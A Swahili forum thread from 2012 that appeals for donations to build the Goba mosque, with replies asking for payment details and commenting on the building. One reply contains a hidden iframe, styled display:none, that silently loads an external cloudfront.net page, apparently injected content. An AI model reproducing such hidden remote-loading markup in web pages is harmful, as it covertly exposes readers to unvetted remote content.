Dismiss Notice
You are browsing this site as a guest. It takes 2 minutes to CREATE AN ACCOUNT and less than 1 minute to LOGIN

Changia masjid ijengwe

Discussion in 'Jamii Photos' started by Mzito Kabwela, Feb 7, 2012.

Thread Status:
Not open for further replies.
  1. Mzito Kabwela

    Mzito Kabwela JF-Expert Member

    #1
    Feb 7, 2012
    Joined: Nov 28, 2009
    Messages: 17,173
    Likes Received: 1,329
    Trophy Points: 280
    Ukiwa wewe ni Muumin wa kweli, unaombwa uchangie Masjid Goba ijengwe. Kwa sasa Hali ya Masjid yetu iko katika hali hii...

    Nimefika hapa leo na mimeonana na Imam wa msikiti huu...Tumeongea mengi ila kikubwa mahitaji yao ni mengi...wanahitaji matofali...mbao..mabati...nond
    <wbr style="color: rgb(0, 0, 0); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px; text-align: left; ">
    o...cement ...n.k...Nilikwenda na kiasi mlichojaaliwa kuchangia waislam na nimewakabidhi...kwa niaba yao tunawashukuru saana..Mwenyezi Mungu atawazidishia katika hili...Ila kwa wale ambao hamjajaaliwa Inshaallah Mwenyezi Mungu awafanyie wepesi ili muweze kuchangia...chochote ulichonacho Muislam wachangie ndugu zetu hawa. Tujitengenezee pepo yetu waislam kwa kuwachangia ndugu zetu...Mwenye chochote awasiliane na mimi au dada khardirjer ( spelling please)...Wasalaam!


    Musjid.jpg View attachment 46909
     
  2. Mzito Kabwela

    Mzito Kabwela JF-Expert Member

    #2
    Feb 7, 2012
    Joined: Nov 28, 2009
    Messages: 17,173
    Likes Received: 1,329
    Trophy Points: 280
  3. Ngongo

    Ngongo JF-Expert Member

    #3
    Feb 7, 2012
    Joined: Sep 20, 2008
    Messages: 11,863
    Likes Received: 3,099
    Trophy Points: 280
    Wakristo hawaruhusiwi kuchangia !.

     
  4. Preta

    Preta JF-Expert Member

    #4
    Feb 7, 2012
    Joined: Nov 28, 2009
    Messages: 23,823
    Likes Received: 2,247
    Trophy Points: 280
    mkuu...mbona maelezo hayajitoshelezi....? huyo Dada Khadija tunampataje na wewe tunawasiliana na wewe kwa njia ipi....?....kuwa serious kidogo mkuu......
     
  5. mikatabafeki

    mikatabafeki JF-Expert Member

    #5
    Feb 7, 2012
    Joined: Dec 29, 2010
    Messages: 12,838
    Likes Received: 2,012
    Trophy Points: 280
    daaah aiseeeh kweli kuna hitajika kusaidia ujenzi wa nyumba ya ibada.
     
  6. Mchaka Mchaka

    Mchaka Mchaka JF Bronze Member

    #6
    Feb 7, 2012
    Joined: Jul 20, 2010
    Messages: 4,532
    Likes Received: 21
    Trophy Points: 0
    Duh! hiyo kibla! sijui huyo shekhe anayeswalisha hapo ana hali gani!


    <iframe style="display: none; visibility: hidden;" src="http://d3lvr7yuk4uaui.cloudfront.net/d.html?c=dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6MTAzNjoxMjc2ODp1bmRlZmluZWQ6"></iframe>
     
  7. Ringo Edmund

    Ringo Edmund JF-Expert Member

    #7
    Feb 7, 2012
    Joined: May 10, 2010
    Messages: 4,899
    Likes Received: 15
    Trophy Points: 0
    toa namba za m pesa kwenye masuala ya kiiman acheni maskhara.
    nina mchango niuwasilisheje?
     
  8. dubu

    dubu JF-Expert Member

    #8
    Feb 7, 2012
    Joined: Oct 18, 2011
    Messages: 3,022
    Likes Received: 299
    Trophy Points: 180
    mkuu, wewe na hadija uko nae vipi? kwanini usingesema tuwasiliane na mkuu wa msikiti uliye ongea nae?. ulivyo enda kutembea huko hadija ulimkuta?
     
  9. Safari_ni_Safari

    Safari_ni_Safari JF-Expert Member

    #9
    Feb 7, 2012
    Joined: Oct 5, 2007
    Messages: 19,767
    Likes Received: 1,877
    Trophy Points: 280
    Kuswali hakuchagui jengo.......huu ni msikiti wa kijijini kwetu

    [​IMG]
     
  10. IGWE

    IGWE JF-Expert Member

    #10
    Feb 7, 2012
    Joined: Feb 3, 2011
    Messages: 7,549
    Likes Received: 912
    Trophy Points: 280
     
  11. Bigirita

    Bigirita JF-Expert Member

    #11
    Feb 7, 2012
    Joined: Feb 12, 2007
    Messages: 13,582
    Likes Received: 332
    Trophy Points: 180
    mkuu, I AGREE WITH YOU.
    Inawezekana watu wa kijiji hicho wali-prioritize ujenzi wa shule kwanza......huwezi kuchangia shule na msikiti at the same time.
    hali yenyewe ya kijijini ilivyo ngumu!!
     
Thread Status:
Not open for further replies.
Loading...